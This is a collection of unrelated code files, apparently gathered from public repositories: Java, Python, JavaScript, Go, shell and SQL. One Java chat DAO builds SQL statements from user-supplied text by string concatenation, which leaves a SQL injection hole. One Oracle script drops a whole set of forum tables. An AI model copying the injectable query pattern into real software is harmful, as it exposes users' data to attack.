java.util.stream.Stream; /** * A POJO mapper that can map between {@link ConceptModel}s and {@link ConceptDataSet}s. */ public class ConceptMapper { private final ConceptIdResolver idResolver; private final RdfModelFactory factory; public ConceptMapper(ConceptIdResolver idResolver, RdfModelFactory modelFactory) { this.idResolver = idResolver; this.factory = modelFactory; } /** * Convert a database data representation to a typed RDF model. * * @param dataset The database dataset to convert. * @return a typed RDF model. */ public ConceptModel map(ConceptDataSet dataset) { try { var builder = factory.createBuilder(ConceptModel.class); var record = dataset.getRecord(); var extractor = new ConceptLabelExtractor(record); builder.setUri(idResolver.resolve(record.getUuid())); extractor.extractTo(builder); if (StringUtils.isNotBlank(record.getSource())) { builder.addEmbeddedModel(DCTerms.source, URI.create(record.getSource())); } for (ConceptRelationshipRecord relationship : dataset.getRelationshipRecords()) { var type = relationship.getType(); var property = type.getSkosProperty(relationship.isTransitive()); var source = relationship.getTargetSource(); RdfModelBuilder<ConceptModel> embeddedModel = factory.createBuilder(ConceptModel.class) .addPlainLiteral(SKOS.prefLabel, relationship.getTargetPreferredLabel()) .setUri(idResolver.resolve(relationship.getTarget())); if (source != null) { embeddedModel.addEmbeddedModel(DCTerms.source, URI.create(source)); } builder.addEmbeddedModel(property, embeddedModel); } ConceptModel concept = builder.build(); concept.setUuid(dataset.getRecord().getUuid()); return concept; } catch (RdfModelException ex) { throw new WebApplicationException("Mapping concept from data records produced invalid RDF", ex); } } /** * Convert a typed RDF model to a database data representation. * * @param model The typed RDF model to convert. * @return a database data representation of the {@link ConceptModel}. */ public ConceptDataSet map(ConceptModel model) { final UUID uuid = model.getUuid(); var record = new ConceptRecord(uuid, model.getProjectId()); record.setSource(model.getSource()); record.setPreferredLabel(model.getPreferredLabel()); record.setAltLabel(model.getAltLabel()); record.setHiddenLabel(model.getHiddenLabel()); record.setNote(model.getNote()); record.setChangeNote(model.getChangeNote()); record.setEditorialNote(model.getEditorialNote()); record.setExample(model.getExample()); record.setHistoryNote(model.getHistoryNote()); record.setScopeNote(model.getScopeNote()); record.setDefinition(model.getDefinition()); var relationshipRecords = new ArrayList<ConceptRelationshipRecord>(); for (var type : ConceptRelationshipType.VALUES) { boolean transitiveSupported = type.hasTransitiveProperty(); Stream<ConceptModel> relationships = model.getRelationships(type, false); Stream<ConceptModel> transitiveRelationships = transitiveSupported ? model.getRelationships(type, true) : Stream.of(); BiConsumer<ConceptModel, Boolean> relationshipMapper = (resource, transitive) -> { var targetUri = resource.getUri(); var targetUuid = idResolver.resolve(targetUri).orElse(UUID.randomUUID()); var targetSource = resource.getSource(); var relationshipRecord = new ConceptRelationshipRecord(uuid, targetUuid, targetSource, type, transitive); relationshipRecords.add(relationshipRecord); }; relationships.forEach(r -> relationshipMapper.accept(r, false)); transitiveRelationships.forEach(tr -> relationshipMapper.accept(tr, true)); } return new ConceptDataSet(record, relationshipRecords); } }
<filename>tests/basics/dict_from_iter.py print(dict([(1, "foo")])) d = dict([("foo", "foo2"), ("bar", "baz")]) print(sorted(d.keys())) print(sorted(d.values())) try: dict(((1,),)) except ValueError: print("ValueError") try: dict(((1, 2, 3),)) except ValueError: print("ValueError")
public class ParseObjectAdapter extends ArrayAdapter<ParseObject> { private List<ParseObject> parseObjects; private Context context; public ParseObjectAdapter(Context context, List<ParseObject> parseObjects) { super(context, 0, parseObjects); this.context = context; this.parseObjects = parseObjects; } @Override public View getView(int position, View convertView, ViewGroup parent) { ImageView imageView; if (convertView == null) { imageView = new ImageView(context); imageView.setScaleType(ImageView.ScaleType.CENTER_CROP); } else { imageView = (ImageView) convertView; } // Load image using Picasso String imageUrl = parseObjects.get(position).getString("imageURL"); Picasso.get().load(imageUrl).placeholder(R.drawable.placeholder_image).into(imageView); return imageView; } }
<filename>labs/babel/src/main.js // imports com babel-loader no web import TodoList from './features/TodoList' import GitHub from './features/GitHub' // import { sum as soma, sub } from './utils/mathematics' import * as mathematics from './utils/mathematics' import minhaPromise from './utils/minhaPromise' TodoList.doSomethingNotRelatedToInstance() const MinhaLista = new TodoList() document.getElementById('bthAddTodo').onclick = () => { MinhaLista.add('Novo todo') MinhaLista.mostraUsuario() } // @babel/plugin-proposal-object-rest-spread const usuario = { nome: '<NAME>', idade: 22, estado: 'Santa Catarina' } const { nome, ...resto } = usuario console.log(nome) console.log(resto) // console.log(soma(1, 2)) // console.log(sub(10, 5)) console.log(mathematics.sum(1, 2)) console.log(mathematics.sub(10, 5)) // Promise ES6 minhaPromise() .then(console.log) .catch(console.error) // @babel/plugin-transform-async-to-generator // async e await ES8 const executaPromise = async () => { const resultado1 = await minhaPromise() console.log(resultado1) const resultado2 = await minhaPromise() console.log(resultado2) } executaPromise() const gitHub = new GitHub()
<reponame>pulsar-chem/BPModule import pulsar as psr def load_ref_system(): """ Returns 2_2_2-trifluoroacetic_acid as found in the IQMol fragment library. All credit to https://github.com/nutjunkie/IQmol """ return psr.make_system(""" C 0.5119 -0.1804 0.1034 C -0.8986 0.4734 -0.1579 O -1.1639 1.6412 -0.0517 O -1.9253 -0.3042 -0.5347 F 1.4648 0.6901 0.4768 F 0.9963 -0.8142 -0.9854 F 0.4730 -1.1227 1.0689 H -1.6614 -1.2137 -0.6023 """)
#! /bin/bash # Downsize the master logos to something more sensible # Requires pngcrush and imagemagick # e.g. # macOS: brew install pngcrush imagemagick # Ubuntu: sudo apt-get install pngcrush imagemagick # cd ./logo for PHOTO_PATH in ./masters/*.png; do FILENAME=`basename $PHOTO_PATH` convert "$PHOTO_PATH" -resize "500>" "$FILENAME" pngcrush -ow $FILENAME done
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/512+512+512-N-VB-ADJ/7-model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/512+512+512-N-VB-ADJ/7-1024+0+512-SS-N-VB-first-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds_sixth --eval_function penultimate_sixth_eval
/* jshint indent: 1 */ module.exports = function(sequelize, DataTypes) { return sequelize.define('fieldedits', { recid: { type: DataTypes.INTEGER, allowNull: false, primaryKey: true, autoIncrement: true, field: 'RECID' }, filename: { type: DataTypes.CHAR, allowNull: true, field: 'FILENAME' }, pkey: { type: DataTypes.INTEGER, allowNull: true, defaultValue: 'CREATE DEFAULT DF_EmptyInteger AS 0; ', field: 'PKEY' }, chgappr: { type: DataTypes.CHAR, allowNull: true, field: 'CHGAPPR' }, editdate: { type: DataTypes.DATE, allowNull: true, field: 'EDITDATE' }, edittime: { type: DataTypes.CHAR, allowNull: true, field: 'EDITTIME' }, beforevalue: { type: DataTypes.STRING, allowNull: true, field: 'BEFOREVALUE' }, control: { type: DataTypes.CHAR, allowNull: true, field: 'CONTROL' }, aftervalue: { type: DataTypes.STRING, allowNull: true, field: 'AFTERVALUE' } }, { tableName: 'FIELDEDITS', timestamps: false }); };
#!/bin/bash # Script to deploy a very simple web application. # The web app has a customizable image and some text. cat << EOM > /var/www/html/index.html <html> <head><title>Meow!</title></head> <body> <div style="width:800px;margin: 0 auto"> <!-- BEGIN --> <center><img src="http://${PLACEHOLDER}/${WIDTH}/${HEIGHT}"></img></center> <center><h2>Meow World!</h2></center> Welcome to Zeb's app. Dogs are superior to cats in all ways. <!-- END --> </div> </body> </html> EOM echo "Script complete."
<reponame>matthewlong29/partyr-service package com.partyrgame.chatservice.dao.impl; import java.util.List; import com.partyrgame.chatservice.dao.ChatDao; import com.partyrgame.chatservice.dao.impl.mapper.ChatRowMapper; import com.partyrgame.chatservice.model.ChatMessage; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.jdbc.core.JdbcTemplate; import org.springframework.stereotype.Repository; import lombok.extern.slf4j.Slf4j; @Slf4j @Repository public class ChatDaoImpl implements ChatDao { @Autowired JdbcTemplate jdbcTemplate; @Autowired ChatRowMapper chatRowMapper; /** * insertMessage. */ public int insertChatMessage(ChatMessage chatMessage) { String query = "CALL `partyrdb`.`save_chat_message`('" + chatMessage.getUsername() + "', '" + chatMessage.getContent() + "', '" + chatMessage.getTimeOfMessage() + "');"; log.debug(query); try { return jdbcTemplate.update(query); } catch (Exception e) { log.error("unable to save chat message {}; error: {}", chatMessage.getContent(), e.getMessage()); } return jdbcTemplate.update(query); } /** * getMessages. */ public List<ChatMessage> getChatMessages() { String query = "CALL `partyrdb`.`get_all_chat_messages`();"; log.debug(query); return jdbcTemplate.query(query, chatRowMapper); } }
export JETBOT_VERSION=jp44 JUPYTER_WORKSPACE=${1:-$HOME} # default to $HOME ./display/enable.sh ./camera/enable.sh ./jupyter/enable.sh $JUPYTER_WORKSPACE
#!/bin/bash # ----------------------------------------- # load environment variables # allow apps to specify cgo flags. The literal text '${build_dir}' is substituted for the build directory godepsJSON="${build}/Godeps/Godeps.json" vendorJSON="${build}/vendor/vendor.json" glideYAML="${build}/glide.yaml" steptxt="----->" YELLOW='\033[1;33m' RED='\033[1;31m' NC='\033[0m' # No Color CURL="curl -s -L --retry 15 --retry-delay 2" # retry for up to 30 seconds warn() { echo -e "${YELLOW} !! $@${NC}" } err() { echo -e >&2 "${RED} !! $@${NC}" } step() { echo "$steptxt $@" } start() { echo -n "$steptxt $@... " } finished() { echo "done" } loadEnvDir() { local env_dir="${1}" if [ ! -z "${env_dir}" ] then mkdir -p "${env_dir}" env_dir=$(cd "${env_dir}/" && pwd) for key in CGO_CFLAGS CGO_CPPFLAGS CGO_CXXFLAGS CGO_LDFLAGS GO_LINKER_SYMBOL GO_LINKER_VALUE GO15VENDOREXPERIMENT GOVERSION GO_INSTALL_PACKAGE_SPEC GO_INSTALL_TOOLS_IN_IMAGE GO_SETUP_GOPATH_IN_IMAGE do if [ -f "${env_dir}/${key}" ] then export "${key}=$(cat "${env_dir}/${key}" | sed -e "s:\${build_dir}:${build}:")" fi done fi } setGoVersionFromEnvironment() { if test -z "${GOVERSION}" then warn "" warn "'GOVERSION' isn't set, defaulting to '${DefaultGoVersion}'" warn "" warn "Run 'heroku config:set GOVERSION=goX.Y' to set the Go version to use" warn "for future builds" warn "" fi ver=${GOVERSION:-$DefaultGoVersion} } determineTool() { if test -f "${godepsJSON}" then TOOL="godep" step "Checking Godeps/Godeps.json file." if ! jq -r . < "${godepsJSON}" > /dev/null then err "Bad Godeps/Godeps.json file" exit 1 fi name=$(<${godepsJSON} jq -r .ImportPath) ver=${GOVERSION:-$(<${godepsJSON} jq -r .GoVersion)} warnGoVersionOverride elif test -f "${vendorJSON}" then TOOL="govendor" step "Checking vendor/vendor.json file." if ! jq -r . < "${vendorJSON}" > /dev/null then err "Bad vendor/vendor.json file" exit 1 fi name=$(<${vendorJSON} jq -r .rootPath) if [ "$name" = "null" -o -z "$name" ] then err "The 'rootPath' field is not specified in 'vendor/vendor.json'." err "'rootPath' must be set to the root package name used by your repository." err "Recent versions of govendor add this field automatically, please upgrade" err "and re-run 'govendor init'." err "" err "For more details see: https://devcenter.heroku.com/articles/go-apps-with-govendor#build-configuration" exit 1 fi ver=${GOVERSION:-$(<${vendorJSON} jq -r .heroku.goVersion)} warnGoVersionOverride if [ "${ver}" = "null" -o -z "${ver}" ] then ver=${DefaultGoVersion} warn "The 'heroku.goVersion' field is not specified in 'vendor/vendor.json'." warn "" warn "Defaulting to ${ver}" warn "" warn "For more details see: https://devcenter.heroku.com/articles/go-apps-with-govendor#build-configuration" warn "" fi elif test -f "${glideYAML}" then TOOL="glide" setGoVersionFromEnvironment elif (test -d "$build/src" && test -n "$(find "$build/src" -mindepth 2 -type f -name '*.go' | sed 1q)") then TOOL="gb" setGoVersionFromEnvironment else err "Godep, GB or govendor are required. For instructions:" err "https://devcenter.heroku.com/articles/go-support" exit 1 fi }
import assert from 'assert'; import {Datetime, datetime} from "../src"; import '../src/plugins/hour12'; import '../src/plugins/century'; import '../src/plugins/dayofyear'; import '../src/plugins/isleapyear'; import '../src/plugins/weeknumber'; import '../src/plugins/iso'; import '../src/plugins/timezone'; import '../src/plugins/transform'; import '../src/plugins/strftime'; describe('Datetime test template', function() { it ('Should be true', () => { assert.strictEqual(datetime("2020-12-21").strftime(), '2020-12-21T02:00:00.000+02:00'); }) it ('Should be true', () => { assert.strictEqual(datetime("2020-12-21").strftime("%d-%m-%Y"), '21-12-2020'); }) it ('Should be true', () => { assert.strictEqual(datetime("2020-12-21").strftime("%d-%m-%Y %1"), '21-12-2020 %1'); }) })
DROP TABLE B_FORUM_SMILE CASCADE CONSTRAINTS / DROP SEQUENCE sq_B_FORUM_SMILE / DROP TABLE B_FORUM CASCADE CONSTRAINTS / DROP SEQUENCE sq_B_FORUM / DROP TABLE B_FORUM_TOPIC CASCADE CONSTRAINTS / DROP SEQUENCE sq_B_FORUM_TOPIC / DROP TABLE B_FORUM_MESSAGE CASCADE CONSTRAINTS / DROP SEQUENCE sq_B_FORUM_MESSAGE / DROP TABLE B_FORUM_FILE CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_FILE / DROP TABLE B_FORUM_USER CASCADE CONSTRAINTS / DROP SEQUENCE sq_B_FORUM_USER / DROP TABLE B_FORUM_PERMS CASCADE CONSTRAINTS / DROP SEQUENCE sq_B_FORUM_PERMS / DROP TABLE B_FORUM_SUBSCRIBE CASCADE CONSTRAINTS / DROP SEQUENCE sq_B_FORUM_SUBSCRIBE / DROP TABLE B_FORUM_RANK CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_RANK / DROP TABLE B_FORUM_RANK_LANG CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_RANK_LANG / DROP TABLE B_FORUM_GROUP CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_GROUP / DROP TABLE B_FORUM_GROUP_LANG CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_GROUP_LANG / DROP TABLE B_FORUM_SMILE_LANG CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_SMILE_LANG / DROP TABLE B_FORUM_POINTS CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_POINTS / DROP TABLE B_FORUM_POINTS_LANG CASCADE CONSTRAINTS / DROP TABLE B_FORUM_POINTS2POST CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_POINTS2POST / DROP TABLE B_FORUM_USER_POINTS CASCADE CONSTRAINTS / DROP TABLE B_FORUM2SITE CASCADE CONSTRAINTS / DROP TABLE B_FORUM_PM_FOLDER CASCADE CONSTRAINTS / DROP TABLE B_FORUM_PRIVATE_MESSAGE CASCADE CONSTRAINTS / DROP TABLE B_FORUM_FILTER CASCADE CONSTRAINTS / DROP TABLE B_FORUM_DICTIONARY CASCADE CONSTRAINTS / DROP TABLE B_FORUM_LETTER CASCADE CONSTRAINTS / DROP TABLE B_FORUM_USER_TOPIC CASCADE CONSTRAINTS / DROP TABLE B_FORUM_USER_FORUM CASCADE CONSTRAINTS / DROP TABLE B_FORUM_STAT CASCADE CONSTRAINTS / DROP TABLE B_FORUM_EMAIL CASCADE CONSTRAINTS / DROP SEQUENCE SQ_B_FORUM_PM_FOLDER / DROP SEQUENCE SQ_B_FORUM_PRIVATE_MESSAGE / DROP SEQUENCE SQ_B_FORUM_FILTER / DROP SEQUENCE SQ_B_FORUM_DICTIONARY / DROP SEQUENCE SQ_B_FORUM_LETTER / DROP SEQUENCE SQ_B_FORUM_USER_TOPIC / DROP SEQUENCE SQ_B_FORUM_STAT / DROP SEQUENCE SQ_B_FORUM_USER_FORUM / DROP SEQUENCE SQ_B_FORUM_EMAIL /
import org.json.JSONArray; import org.json.JSONObject; import org.junit.Assert; public class SearchAnalyzer { private static final String M4_URL = "https://example.com"; // Replace with the actual URL public static void main(String[] args) { String keyword = "qq"; String url = M4_URL + "/search/getSearchResult_newJson.htm?keyWord=" + keyword + "&p=undefined"; String result = getHttpResponse4Get(url); try { if (!result.isEmpty()) { JSONObject re = new JSONObject(result); JSONArray app = re.getJSONArray("appDetails"); // Check if search results are not empty Assert.assertTrue(app.length() != 0, "Search result is empty!!"); // Check if the number of search results falls within the specified range Assert.assertTrue(app.length() <= 50 && app.length() > 20, "Search results for keyword 'qq' have a length of: " + app.length()); } else { System.out.println("Empty response received from the server."); } } catch (Exception e) { System.out.println("An error occurred while processing the search results: " + e.getMessage()); } } // Simulated HTTP GET request function private static String getHttpResponse4Get(String url) { // Implement the logic to make an HTTP GET request and return the response as a string // This can be achieved using libraries like Apache HttpClient or HttpURLConnection // For simplicity, we can simulate the response for demonstration purposes return "{\"appDetails\": [{\"name\": \"App1\"}, {\"name\": \"App2\"}]}"; } }
# -*- coding: utf-8 -*- ############################################################################## # # Copyright (C) 2016 Pambudi Satria (<https://github.com/pambudisatria>). # @author Pambudi Satria <pambudi.satria@yahoo.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp import fields, models, api from openerp.osv import osv import openerp.addons.decimal_precision as dp class account_invoice_line(models.Model): _inherit = "account.invoice.line" @api.one @api.depends('price_unit', 'discount', 'invoice_line_tax_id', 'quantity', 'product_id', 'invoice_id.partner_id', 'invoice_id.currency_id') def _compute_price(self): price = self.price_unit * (1 - (self.discount or 0.0) / 100.0) taxes = self.invoice_line_tax_id.compute_all(price, self.quantity, product=self.product_id, partner=self.invoice_id.partner_id) tax_extra_ship_cost = self.invoice_line_tax_id.compute_all(self.extra_shipping_cost, 1, product=self.product_id, partner=self.invoice_id.partner_id) tax_insurance_fee = self.invoice_line_tax_id.compute_all(self.insurance_fee, 1, product=self.product_id, partner=self.invoice_id.partner_id) tax_admcost_insurance = self.invoice_line_tax_id.compute_all(self.admcost_insurance, 1, product=self.product_id, partner=self.invoice_id.partner_id) tax_packing_cost = self.invoice_line_tax_id.compute_all(self.packing_cost, 1, product=self.product_id, partner=self.invoice_id.partner_id) self.price_subtotal = taxes['total'] + tax_extra_ship_cost['total'] + tax_insurance_fee['total'] + tax_admcost_insurance['total'] + tax_packing_cost['total'] if self.invoice_id: self.price_subtotal = self.invoice_id.currency_id.round(self.price_subtotal) def _compute_insurance_fee(self): insurance_fee = self.insurance_value*((0.2)/100) extra_shipping_cost = fields.Float(string='Extra Shipping Cost', digits= dp.get_precision('Product Price'), default=0.0) insurance_value = fields.Float(string='Insurance Value', digits= dp.get_precision('Product Price'), default=0.0) insurance_fee = fields.Float(string='Insurance Fee', digits= dp.get_precision('Product Price'), default=0.0) admcost_insurance = fields.Float(string='Cost Administration of Insurance', digits= dp.get_precision('Product Price'), default=0.0) packing_cost = fields.Float(string='Packing Cost', digits= dp.get_precision('Product Price'), default=0.0) class account_invoice_tax(models.Model): _inherit = "account.invoice.tax" @api.v8 def compute(self, invoice): tax_grouped = {} currency = invoice.currency_id.with_context(date=invoice.date_invoice or fields.Date.context_today(invoice)) company_currency = invoice.company_id.currency_id for line in invoice.invoice_line: taxes = line.invoice_line_tax_id.compute_all( (line.price_unit * (1 - (line.discount or 0.0) / 100.0)), line.quantity, line.product_id, invoice.partner_id)['taxes'] taxes += line.invoice_line_tax_id.compute_all( line.extra_shipping_cost, 1, line.product_id, invoice.partner_id)['taxes'] taxes += line.invoice_line_tax_id.compute_all( line.insurance_fee, 1, line.product_id, invoice.partner_id)['taxes'] taxes += line.invoice_line_tax_id.compute_all( line.admcost_insurance, 1, line.product_id, invoice.partner_id)['taxes'] taxes += line.invoice_line_tax_id.compute_all( line.packing_cost, 1, line.product_id, invoice.partner_id)['taxes'] for tax in taxes: val = { 'invoice_id': invoice.id, 'name': tax['name'], 'amount': tax['amount'], 'manual': False, 'sequence': tax['sequence'], 'base': currency.round(tax['price_unit'] * line['quantity']), } if invoice.type in ('out_invoice','in_invoice'): val['base_code_id'] = tax['base_code_id'] val['tax_code_id'] = tax['tax_code_id'] val['base_amount'] = currency.compute(val['base'] * tax['base_sign'], company_currency, round=False) val['tax_amount'] = currency.compute(val['amount'] * tax['tax_sign'], company_currency, round=False) val['account_id'] = tax['account_collected_id'] or line.account_id.id val['account_analytic_id'] = tax['account_analytic_collected_id'] else: val['base_code_id'] = tax['ref_base_code_id'] val['tax_code_id'] = tax['ref_tax_code_id'] val['base_amount'] = currency.compute(val['base'] * tax['ref_base_sign'], company_currency, round=False) val['tax_amount'] = currency.compute(val['amount'] * tax['ref_tax_sign'], company_currency, round=False) val['account_id'] = tax['account_paid_id'] or line.account_id.id val['account_analytic_id'] = tax['account_analytic_paid_id'] # If the taxes generate moves on the same financial account as the invoice line # and no default analytic account is defined at the tax level, propagate the # analytic account from the invoice line to the tax line. This is necessary # in situations were (part of) the taxes cannot be reclaimed, # to ensure the tax move is allocated to the proper analytic account. if not val.get('account_analytic_id') and line.account_analytic_id and val['account_id'] == line.account_id.id: val['account_analytic_id'] = line.account_analytic_id.id key = (val['tax_code_id'], val['base_code_id'], val['account_id']) if not key in tax_grouped: tax_grouped[key] = val else: tax_grouped[key]['base'] += val['base'] tax_grouped[key]['amount'] += val['amount'] tax_grouped[key]['base_amount'] += val['base_amount'] tax_grouped[key]['tax_amount'] += val['tax_amount'] for t in tax_grouped.values(): t['base'] = currency.round(t['base']) t['amount'] = currency.round(t['amount']) t['base_amount'] = currency.round(t['base_amount']) t['tax_amount'] = currency.round(t['tax_amount']) return tax_grouped
# Generate the Rails app rails new my_app # Create the models rails generate model user name:string email:string rails generate model product name:string description:text price:decimal rails generate model category name:string # Generate controller and views rails generate controller users rails generate controller products rails generate controller categories # Create the database rake db:create rake db:migrate # Create routes resources :users resources :products resources :categories
printf "Waiting for Spark to initialize..." while [ ! -f /tmp/hadoop-root/restore_complete ] do sleep 3 printf "." done echo "" echo "##############" echo "Spark Ready" echo "Cluster http://localhost:8084" echo "Thrift application http://localhost:8085" echo "History http://localhost:8086" echo "HDFS browser http://localhost:8087" echo "Worker http://localhost:8088" echo "Thrift JDBC jdbc:hive2://localhost:5434" echo "##############"
package framework import ( "encoding/json" "github.com/ghodss/yaml" "github.com/rh-messaging/shipshape/pkg/framework/log" "io/ioutil" v1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/runtime/schema" "net/http" ) type ResourceType int const ( Issuers ResourceType = iota Certificates Deployments ) var ( resourceMap = map[ResourceType]schema.GroupVersionResource{ Issuers: { Group: "certmanager.k8s.io", Version: "v1alpha1", Resource: "issuers", }, Certificates: { Group: "certmanager.k8s.io", Version: "v1alpha1", Resource: "certificates", }, Deployments: {Group: "apps", Version: "v1", Resource: "deployments"}, } ) // GetResource returns the given resource type, identified by its given name func (c *ContextData) GetResource(resourceType ResourceType, name string) (*unstructured.Unstructured, error) { return c.Clients.DynClient.Resource(resourceMap[resourceType]).Namespace(c.Namespace).Get(name, v1.GetOptions{}) } func (c *ContextData) GetResourceGroupVersion(gv schema.GroupVersionResource, name string) (*unstructured.Unstructured, error) { return c.Clients.DynClient.Resource(gv).Namespace(c.Namespace).Get(name, v1.GetOptions{}) } // ListResources returns a list of resources found in the related Framework's namespace, // for the given resource type func (c *ContextData) ListResources(resourceType ResourceType) (*unstructured.UnstructuredList, error) { return c.Clients.DynClient.Resource(resourceMap[resourceType]).Namespace(c.Namespace).List(v1.ListOptions{}) } func (c *ContextData) ListResourcesGroupVersion(gv schema.GroupVersionResource) (*unstructured.UnstructuredList, error) { return c.Clients.DynClient.Resource(gv).Namespace(c.Namespace).List(v1.ListOptions{}) } // CreateResource creates a resource based on provided (known) resource type and unstructured data func (c *ContextData) CreateResource(resourceType ResourceType, obj *unstructured.Unstructured, options v1.CreateOptions, subresources ...string) (*unstructured.Unstructured, error) { return c.Clients.DynClient.Resource(resourceMap[resourceType]).Namespace(c.Namespace).Create(obj, options, subresources...) } func (c *ContextData) CreateResourceGroupVersion(gv schema.GroupVersionResource, obj *unstructured.Unstructured, options v1.CreateOptions, subresources ...string) (*unstructured.Unstructured, error) { return c.Clients.DynClient.Resource(gv).Namespace(c.Namespace).Create(obj, options, subresources...) } // DeleteResource deletes a resource based on provided (known) resource type and name func (c *ContextData) DeleteResource(resourceType ResourceType, name string, options v1.DeleteOptions, subresources ...string) error { return c.Clients.DynClient.Resource(resourceMap[resourceType]).Namespace(c.Namespace).Delete(name, &options, subresources...) } func (c *ContextData) DeleteResourceGroupVersion(gv schema.GroupVersionResource, name string, options v1.DeleteOptions, subresources ...string) error { return c.Clients.DynClient.Resource(gv).Namespace(c.Namespace).Delete(name, &options, subresources...) } func LoadYamlFromUrl(url string) (*unstructured.Unstructured, error) { var unsObj unstructured.Unstructured resp, err := http.Get(url) //load yaml body from url if err != nil { log.Logf("error during loading %s: %v", url, err) return nil, err } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil { log.Logf("error during loading %s: %v", url, err) return nil, err } jsonBody, err := yaml.YAMLToJSON(body) if err != nil { log.Logf("error during parsing %s: %v", url, err) return nil, err } err = json.Unmarshal(jsonBody, &unsObj) return &unsObj, err }
#!/bin/sh jobname_D='D' f='NuE' s=22 e='low_energy' y='IC86_flasher_p1=0.3_p2=1.0' p='photon_spice3_2' phot='mcpe' domeff=0.99 domos=1 holeice='flasher_p1=0.3_p2=1.0' for i in {1..8000} do ((j=$i/1000+1)) ((l=$((i-$((j-1))*1000)))) JOBID_D=$jobname_D$i echo JOB $JOBID_D detector_mcpe.condor phofile="/data/ana/Cscd/StartingEvents/NuGen_new/$f/$e/$p/$j/photon_`printf %08d $i`.i3.zst" detfile="/data/ana/Cscd/StartingEvents/NuGen_new/$f/$e/$y/detector/$j/det_`printf %08d $i`.i3.zst" bgfile="/data/ana/Cscd/StartingEvents/CORSIKA_bg/12531/"$phot"_spice3_2/1/"$phot"_0000`printf %04d $l`.i3.zst" echo VARS $JOBID_D seed=\"$s\" runnumber=\"$i\" infile=\"$phofile\" outfile=\"$detfile\" bgfile=\"$bgfile\" hi=\"$holeice\" domeff=\"$domeff\" domos=\"$domos\" echo Retry $JOBID_D 2 done
<gh_stars>1-10 /** * @author <NAME> <<EMAIL>> * @copyright 2020 Photon Storm Ltd. * @license {@link https://opensource.org/licenses/MIT|MIT License} */ /** * Retrieves the value of the given key from an object. * * @function Phaser.Tweens.Builders.GetBoolean * @since 3.0.0 * * @param {object} source - The object to retrieve the value from. * @param {string} key - The key to look for in the `source` object. * @param {*} defaultValue - The default value to return if the `key` doesn't exist or if no `source` object is provided. * * @return {*} The retrieved value. */ var GetBoolean = function (source, key, defaultValue) { if (!source) { return defaultValue; } else if (source.hasOwnProperty(key)) { return source[key]; } else { return defaultValue; } }; module.exports = GetBoolean;
def z_score_normalization(arr): mean = sum(arr)/len(arr) std_dev = 0 for i in range(len(arr)): std_dev += (arr[i] - mean)**2 std_dev /= len(arr) std_dev = std_dev**.5 normalized_arr = [] for i in range(len(arr)): normalized_arr.append((arr[i]-mean) / std_dev) return normalized_arr